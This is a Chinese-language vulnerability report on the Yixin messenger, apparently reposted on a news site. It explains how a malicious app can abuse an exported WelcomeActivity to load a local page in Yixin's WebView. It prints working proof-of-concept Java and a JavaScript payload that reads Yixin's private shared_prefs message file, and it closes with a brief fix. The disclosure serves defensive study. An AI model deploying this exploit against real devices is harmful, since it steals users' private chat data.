易信组件信息泄露漏洞 可致恶意APP获取其私有目录数据(非root环境)
易信的组件使用不当存在信息泄露漏洞、弹窗,恶意攻击者可能可以使用这个漏洞窃取用户隐私,或者弹一些恶意构造的广告
启动界面WelcomeActivity是导出的, WelcomeActivity的.method private h()V存在如下smali:
Lim/yixin/activity/WelcomeActivity;->getIntent()Landroid/content/Intent;......Landroid/content/Intent;->getParcelableExtra(Ljava/lang/String;)Landroid/os/Parcelable;......Lim/yixin/activity/WelcomeActivity;->startActivity(Landroid/content/Intent;)V
当一个攻击app(恶意或非恶意均可以) 可以通过这个导出的组件,打开一个本地页面时,此本地页面中的可以按照攻击app的要求获取易信下的所有数据,包括聊天数据库等,盗取过程无需root,盗取之后可以发送给远程服务器!
利用细节:
这里是手动把file:///mnt/sdcard/yixin.html放在sd卡上,在攻击app中直接释放这个html
主要实现代码:
static final String YIXIN_PKG = "im.yixin"; static final String CustomWebView_ACTIVITY = "im.yixin.activity.CustomWebView"; static final String Welcome_ACTIVITY = "im.yixin.activity.WelcomeActivity"; public void attack() { Intent contIntent = new Intent(); contIntent.putExtra("url", "file:///mnt/sdcard/yixin.html"); Intent intent = new Intent(); intent.setClassName(YIXIN_PKG, Welcome_ACTIVITY); Class lunch = null; File aOptimizedDexOutputPath = getDir("outdex", Context.MODE_PRIVATE); File dexFile = new File("/data/app/im.yixin-1.apk"); if(dexFile.exists()){ DexClassLoader loader = new DexClassLoader(dexFile.toString() , aOptimizedDexOutputPath.getAbsolutePath() , null , ClassLoader.getSystemClassLoader()); try {lunch = Class.forName("im.yixin.activity.CustomWebView",true,loader);} catch (ClassNotFoundException e) {e.printStackTrace();} } intent.putExtra("target", lunch); intent.putExtra("data", contIntent); this.startActivity(intent); }
存放在/mnt/sdcard/yixin.html内容如下:
<html><body><script type="text/javascript">function getMessage() {var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest();if(request.overrideMimeType) {request.overrideMimeType('text/xml');} } xmlhttp = request; //获取本地文件代码 xmlhttp.open("GET", "file:////data/data/im.yixin/shared_prefs/saveTextMessage.xml", false); xmlhttp.send(null); var ret = xmlhttp.responseText;return ret;}alert(getMessage());</script></body></html>
导出activity,导致可以打开一个本地页面时,此本地页面中的可以按照攻击app的要求获取易信下的所有数据,包括聊天数据库等,盗取过程无需root,盗取之后可以发送给远程服务器!
修复方案:
导出activity控制getIntent以及getParcelableExtra的使用
>更多相关文章
首页推荐
佛山市东联科技有限公司一直秉承“一切以用户价值为依归
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 12-25优酷推出U镜到底等直播功能 已应用在羽毛球
- 12-25百川智能正式发布全链路领域增强大模型
- 12-25SHEIN4家仓储物流园获“零废工厂”认证
- 12-25西方博主在TikTok上展现中国风貌,“China
- 12-05亚马逊推出新一代基础模型 任意模态生成大模
相关文章
24小时热门资讯
24小时回复排行
热门推荐
最新资讯
操作系统
黑客防御